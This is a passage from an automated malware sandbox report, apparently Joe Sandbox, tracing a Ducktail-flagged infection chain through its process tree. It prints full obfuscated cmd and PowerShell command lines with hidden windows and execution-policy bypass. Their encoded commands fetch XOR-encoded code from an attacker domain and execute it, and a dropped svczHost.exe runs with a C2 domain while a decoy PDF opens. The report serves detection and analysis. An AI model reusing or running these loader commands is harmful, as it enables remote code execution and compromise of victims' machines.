                                                                                                        2024-11-08 10:12:42 UTC1369INData Raw: 92 04 7b 3b 78 3b cf c4 c7 04 7b 3b 78 3b cf c4 76 7b 7b 3b 78 3b cf c4 a9 7b 7b 3b 78 3b cf c4 e3 7b 7b 3b 78 3b cf c4 25 7a 7b 3b 78 3b cf c4 5f 7a 7b 3b 78 3b cf c4 93 7a 7b 3b 78 3b cf c4 cd 7a 7b 3b 78 3b cf c4 17 79 7b 3b 78 3b cf c4 5f 79 7b 3b 78 3b cf c4 9b 79 7b 3b 78 3b cf c4 e0 79 7b 3b 78 3b cf c4 22 78 7b 3b 78 3b cf c4 52 78 7b 3b 78 3b cf c4 91 78 7b 3b 78 3b cf c4 dd 78 7b 3b 78 3b cf c4 0f 7f 7b 3b 78 3b cf c4 49 7f 7b 3b 78 3b cf c4 95 7f 7b 3b 78 3b cf c4 38 7e 7b 3b 78 3b cf c4 51 7e 7b 3b 78 3b cf c4 f9 7e 7b 3b 78 3b cf c4 2c 7d 7b 3b 78 3b cf c4 be 7d 7b 3b 78 3b cf c4 df 7d 7b 3b 78 3b cf c4 7b 7c 7b 3b 78 3b cf c4 9d 7c 7b 3b 78 3b cf c4 25 73 7b 3b 78 3b cf c4 aa 73 7b 3b 78 3b cf c4 2d 72 7b 3b 78 3b cf c4 44 72 7b 3b 78 3b cf
                                                                                                        Data Ascii: {;x;{;x;v{{;x;{{;x;{{;x;%z{;x;_z{;x;z{;x;z{;x;y{;x;_y{;x;y{;x;y{;x;"x{;x;Rx{;x;x{;x;x{;x;{;x;I{;x;{;x;8~{;x;Q~{;x;~{;x;,}{;x;}{;x;}{;x;{|{;x;|{;x;%s{;x;s{;x;-r{;x;Dr{;x;


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:05:10:27
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit
                                                                                                        Imagebase:0x7ff650de0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:05:10:27
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:05:10:27
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="
                                                                                                        Imagebase:0x7ff739c60000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Ducktail_11, Description: Yara detected Ducktail, Source: 00000002.00000002.3084642389.0000013EDADAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:3
                                                                                                        Start time:05:10:27
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:05:10:30
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline"
                                                                                                        Imagebase:0x7ff7db120000
                                                                                                        File size:2'759'232 bytes
                                                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:05:10:30
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF9A.tmp" "c:\Users\user\AppData\Local\Temp\wr03xjs0\CSC787E510638EC4229B85DAEC3AD1CFCC9.TMP"
                                                                                                        Imagebase:0x7ff707dd0000
                                                                                                        File size:52'744 bytes
                                                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:05:10:37
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                        Imagebase:0x7ff739c60000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:05:10:37
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7f5610000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:05:10:40
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                                        Imagebase:0x7ff650de0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:05:10:40
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:05:10:41
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                                        Imagebase:0x7ff739c60000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:11
                                                                                                        Start time:05:10:41
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:12
                                                                                                        Start time:05:10:42
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf"
                                                                                                        Imagebase:0x5a0000
                                                                                                        File size:3'891'152 bytes
                                                                                                        MD5 hash:0F4FB7ADA3C27236864D008A1687AD8D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:13
                                                                                                        Start time:05:10:43
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
                                                                                                        Imagebase:0x320000
                                                                                                        File size:2'841'040 bytes
                                                                                                        MD5 hash:35AF5C1FA6FAC9569BB3FF6654A7152E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:14
                                                                                                        Start time:05:10:44
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2352 --field-trial-handle=1644,i,17074868649269977898,11316506185755287373,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                        Imagebase:0x320000
                                                                                                        File size:2'841'040 bytes
                                                                                                        MD5 hash:35AF5C1FA6FAC9569BB3FF6654A7152E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:16
                                                                                                        Start time:05:10:47
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        Imagebase:0x7ff7f5610000
                                                                                                        File size:496'640 bytes
                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:17
                                                                                                        Start time:05:11:12
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\Temp\svczHost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
                                                                                                        Imagebase:0x7ff7046b0000
                                                                                                        File size:8'351'232 bytes
                                                                                                        MD5 hash:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 16%, ReversingLabs
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:18
                                                                                                        Start time:05:11:13
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
